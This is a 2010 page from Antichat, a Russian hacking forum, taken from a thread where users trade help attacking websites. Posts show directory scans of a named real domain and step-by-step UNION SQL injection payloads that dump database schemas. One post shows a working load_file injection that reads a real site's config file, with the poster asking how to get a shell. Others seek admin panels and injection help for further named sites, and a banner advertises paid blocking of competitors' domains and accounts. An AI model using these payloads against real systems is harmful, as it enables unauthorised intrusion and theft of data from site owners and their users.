Ваши вопросы по уязвимостям.

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1398 из 2422

1398

Опции темы

Поиск в этой теме

Опции просмотра

09.07.2010, 20:14

MAQUEEN

Постоянный

Регистрация: 27.09.2008

Сообщений: 469

С нами: 9273926

Репутация: 309

Отправить сообщение для MAQUEEN с помощью AIM

Отправить сообщение для MAQUEEN с помощью Yahoo

спаасибо за ответ.

𝕏 Twitter Reddit Telegram Копировать ссылку

09.07.2010, 21:06

jecka3000

Постоянный

Регистрация: 15.03.2008

Сообщений: 441

С нами: 9555536

Репутация: 95

помогите найти админку...http://www.nll.com/

09.07.2010, 21:13

CyberHunter

Постоянный

Регистрация: 06.01.2010

Сообщений: 785

С нами: 8602291

Репутация: 256

Цитата:

Сообщение от None

помогите найти админку...http://www.nll.com/

Вот: http://www.nll.com/admin.inc. Но там 403.

З.Ы. Видел уже не один твой подобный пост. Скачай себе сканер директорий сайта и им же ищи админку.

09.07.2010, 21:48

FlaktW

Участник форума

Регистрация: 19.08.2009

Сообщений: 115

С нами: 8803961

Репутация: 8

Цитата:

Сообщение от jecka3000

помогите найти админку...http://www.nll.com/

Попробуй выбрать из этого:

Цитата:

Сообщение от None

» http://www.nll.com/.htaccess HTTP 403 Forbidden
» http://www.nll.com/.htconfig HTTP 403 Forbidden
» http://www.nll.com/.htpasswd HTTP 403 Forbidden
» http://www.nll.com/header.php HTTP 200 OK
» http://www.nll.com/footer.php HTTP 200 OK
» http://www.nll.com/cgi-bin/ HTTP 403 Forbidden
» http://www.nll.com/cache/ HTTP 200 OK
» http://www.nll.com/chat/ HTTP 200 OK
» http://www.nll.com/logos/ HTTP 401 Authorization Required
» http://www.nll.com/stats/ HTTP 403 Forbidden
» http://www.nll.com/config.php.inc HTTP 403 Forbidden
» http://www.nll.com/config.inc HTTP 403 Forbidden
» http://www.nll.com/uploads/ HTTP 200 OK
» http://www.nll.com/~root HTTP 403 Forbidden
» http://www.nll.com/admin.inc HTTP 403 Forbidden
» http://www.nll.com/community/ HTTP 200 OK
» http://www.nll.com/config.inc HTTP 403 Forbidden
» http://www.nll.com/database.inc HTTP 403 Forbidden
» http://www.nll.com/db.inc HTTP 403 Forbidden
» http://www.nll.com/extension.inc HTTP 403 Forbidden
» http://www.nll.com/favicon.ico HTTP 200 OK
» http://www.nll.com/function.inc HTTP 403 Forbidden
» http://www.nll.com/horde/ HTTP 302 Found
» http://www.nll.com/icons/ HTTP 200 OK
» http://www.nll.com/index.php HTTP 200 OK
» http://www.nll.com/mobile/ HTTP 200 OK
» http://www.nll.com/users.inc HTTP 403 Forbidden
» http://www.nll.com/webmail/ HTTP 200 OK

10.07.2010, 12:25

Dare

Новичок

Регистрация: 26.04.2010

Сообщений: 26

С нами: 8444531

Репутация: 53

Decoy

хм... пробуй такой запрос site.com/fail.php?id=-1+union+select

+GROUP_CONCAT(concat_ws(0x3a,table_schema,TABLE_NA ME)+SEPARATOR+0x3C62723E)+from+information_schema. columns+where+column_name+like+0x257061737325+or+c olumn_name+like+0x25702577256425--+

Далее из полученных таблиц выводи имена колонок:

site.com/fail.php?id=-1+union+select

+GROUP_CONCAT(column_name)+SEPARATOR+0x3C62723E)+f rom+information_schema.columns+where+table_name=з ахексенное.имя.таблицы--+

получаешь имена колонок, и:

site.com/fail.php?id=-1+union+select

+concat_ws(0x3a,имена необходимых колонок)+from+iимя.таблицы--+ (если не будет вывода через точку имя_базы.имя_таблицы)

ЗЫ: +(пробел) перед коментариями не нужен) =) всего)

10.07.2010, 13:17

haito

Новичок

Регистрация: 27.05.2010

Сообщений: 13

С нами: 8399502

Репутация: 0

Добрый день!

С помощью этого сайта можно загрузить config.php, но он не показывает все файлы содержат.

Есть ли у нас какой-либо способ для просмотра полного файл или заполнить оболочку?

http://www.siremax.com.mx/remaxnatura/propiedad-detalle.php?tipo=casas&id=9844 and 1=0 UNION SELECT 1,2,load_file(0x2F7661722F7777772F68746D6C2F72656D 61782F72656D61786D756C74697573752F7070686C6F676765 722F636F6E6669672E696E632E706870),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44 ,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,6 1,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77, 78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94 ,95,96,97,98,99,100,101,102,103,104,105,106,107,10 8,109,110,111,112,113--

10.07.2010, 15:37

$r00tkit$

Новичок

Регистрация: 23.06.2010

Сообщений: 11

С нами: 8361686

Репутация: 0

Цитата:

Сообщение от haito

Добрый день!
С помощью этого сайта можно загрузить config.php, но он не показывает все файлы содержат.
Есть ли у нас какой-либо способ для просмотра полного файл или заполнить оболочку?
http://www.siremax.com.mx/remaxnatura/propiedad-detalle.php?tipo=casas&id=9844 and 1=0 UNION SELECT 1,2,load_file(0x2F7661722F7777772F68746D6C2F72656D 61782F72656D61786D756C74697573752F7070686C6F676765 722F636F6E6669672E696E632E706870),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44 ,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,6 1,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77, 78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94 ,95,96,97,98,99,100,101,102,103,104,105,106,107,10 8,109,110,111,112,113--

Можно смотреть через исходник. Либо использевать sipt4, им на много удобнее.

10.07.2010, 16:24

haito

Новичок

Регистрация: 27.05.2010

Сообщений: 13

С нами: 8399502

Репутация: 0

Цитата:

Сообщение от $r00tkit$

Можно смотреть через исходник. Либо использевать sipt4, им на много удобнее.

исходный код показать предела информации, посмотрите как некоторые функции вырезать. мы можем читать (load_file) построчно?

". '('.mysql_errno().') '.mysql_error().'

'. "Please check your settings in config.inc.php !

"); mysql_select_db(PPHL_DB_NAME) or die("Please first create your database '".PPHL_DB_NAME."' and make sure your user got the correct access rights on it !"); ; define('__GOT_MYSQL__', 1); } ?>

10.07.2010, 17:45

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

С нами: 9642449

Репутация: 606

Цитата:

Сообщение от haito

исходный код показать предела информации, посмотрите как некоторые функции вырезать. мы можем читать (load_file) построчно?
". '('.mysql_errno().') '.mysql_error().'
'. "Please check your settings in config.inc.php !
"); mysql_select_db(PPHL_DB_NAME) or die("Please first create your database '".PPHL_DB_NAME."' and make sure your user got the correct access rights on it !"); ; define('__GOT_MYSQL__', 1); } ?>

Нажми Ctrl+U на клавиатуре и посмотри.

Press Ctrl+U on your keyboard and see

#10

10.07.2010, 18:05

happygirl

Новичок

Регистрация: 10.07.2010

Сообщений: 8

С нами: 8337206

Репутация: 0

Пожалуйста, помогите мне, как добраться таблиц и столбцов с этого сайта. Я не могу использовать синтаксис union_

http://www.canal.qc.ca/recherche.php?type=domaine&domaine=2%27

Цитата:

Сообщение от None

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2'' ORDER BY emissions.sTitre' at line 1

Страница 1398 из 2422

1398

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules